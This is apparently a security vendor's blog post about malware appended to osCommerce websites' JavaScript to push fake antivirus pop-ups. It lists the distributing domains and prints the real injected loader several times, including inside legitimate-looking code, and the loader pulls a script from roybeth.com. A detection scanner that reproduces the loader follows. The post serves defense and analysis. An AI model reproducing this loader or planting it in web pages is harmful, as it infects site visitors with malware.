• osCommerce Attacks

    Malicious hackers are always looking to exploit software used by website owners to power their websites. One popular type of application that malicious hackers target is shopping carts, like osCommerce. This allows them to compromise a large number of websites using the software, infecting the visitors to these sites with malware.

    We have described how malicious hackers exploit osCommerce installations in a past article. This post details a new piece of malware that is affecting osCommerce websites.

    The attack
    Shopping carts like osCommerce are prime targets for malicious hackers since they are widely used, store a plethora of sensitive information, and are a prime vector for embedding malware on a website to infect visitors and customers.

    A recent trend is to display fake Anti-Virus pop-up advertisements to visitors of a site when they land on an infected webpage. The following websites are being used to distribute the fake Anti-Virus malware.

    Sites distributing the malware:

    roybeth.com
    schenkenbrunn.at
    puremojofoto.com
    pindating.com
    nadobolchetrafa.cx.cc
    

    Compromised websites in the wild
    One example of a site infected with this specific malware is: www.surfmonster.co.uk. Take a look at the code below to see how the malware has been appended to the JavaScript.

    A sample of the actual malware:

     
    var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php";try { s=document.createElement("script"); s.src=ss; document.body.appendChild( s ); } catch(erst){ }
    

    A more detailed description of how the malware is appended is presented in one of our previous posts.

          this.hook.enabled = 1;
    
            // Cache so updates are infrequent.
            tiles.old = {
                    w: elmW,
                    h: elmH,
                    x: bgX,
                    y: bgY,
                    r: bgR
            };
    };
    var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }
    

    Recommended steps
    First, remove the malware. Then, upgrade your installation of osCommerce and analyze your website for application vulnerabilities. Additionally, securing the permission settings of your “admin” directory or renaming the directory to a value different from the default can mitigate automated attacks.
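
    To locate the appended loader before removing it, the following added example (not code from the original post) scans JavaScript source for dynamically created script elements and resolves the final value assigned to src; in the sample above, ss is assigned twice and only the second value is loaded. The allowlist, the SELF placeholder host and all function names are assumptions.

```javascript
// Added example (not from the original post). ALLOWED_HOSTS is an assumed
// allowlist; SELF is a placeholder base so relative URLs resolve as same-site.
const ALLOWED_HOSTS = new Set(["ajax.googleapis.com"]);
const SELF = "self.invalid";
const IDENT = "[A-Za-z_$][\\w$]*";
const esc = (name) => name.replace(/\$/g, "\\$");

// The LAST string assigned to `name` before `beforeIndex` is what the browser
// uses, so a harmless-looking first assignment (the decoy) is ignored.
function lastStringAssigned(source, name, beforeIndex) {
  const re = new RegExp("\\b" + esc(name) + "\\s*=\\s*([\"'])(.*?)\\1", "g");
  let value = null, m;
  while ((m = re.exec(source)) !== null && m.index < beforeIndex) value = m[2];
  return value;
}

function findInjectedLoaders(source, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  const createRe = new RegExp(
    "(" + IDENT + ")\\s*=\\s*document\\.createElement\\(\\s*[\"']script[\"']\\s*\\)", "g");
  let c;
  while ((c = createRe.exec(source)) !== null) {
    // First `<elem>.src = "literal"` or `<elem>.src = identifier` after creation.
    const srcRe = new RegExp(
      "\\b" + esc(c[1]) + "\\.src\\s*=\\s*(?:([\"'])(.*?)\\1|(" + IDENT + "))", "g");
    srcRe.lastIndex = c.index;
    const s = srcRe.exec(source);
    if (!s) continue;
    const url = s[3] ? lastStringAssigned(source, s[3], s.index) : s[2];
    // Unresolved or unparsable values keep host === null and are reported for review.
    let host = null;
    try { if (url !== null) host = new URL(url, "http://" + SELF).hostname; } catch (e) {}
    if (host === SELF || (host !== null && allowedHosts.has(host))) continue;
    findings.push({ offset: c.index, url, host });
  }
  return findings;
}

// Constructed input: legitimate code followed by the page's loader, appended twice.
const LOADER = 'var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",' +
  'ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); ' +
  's.src=ss; document.body.appendChild(s); } catch(erst) { }';
const SAMPLE_INFECTED = "tiles.old = { w: elmW, h: elmH };\n" + LOADER + LOADER;
const SAMPLE_CLEAN = 'var s=document.createElement("script"); ' +
  's.src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js";';

console.log(findInjectedLoaders(SAMPLE_INFECTED)); // two findings, host roybeth.com
console.log(findInjectedLoaders(SAMPLE_CLEAN));    // []
```

    Each finding's offset marks where the injected block begins in the file, which is the point from which to compare against a known-good copy.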

    How do I protect my site?
    Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

    StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…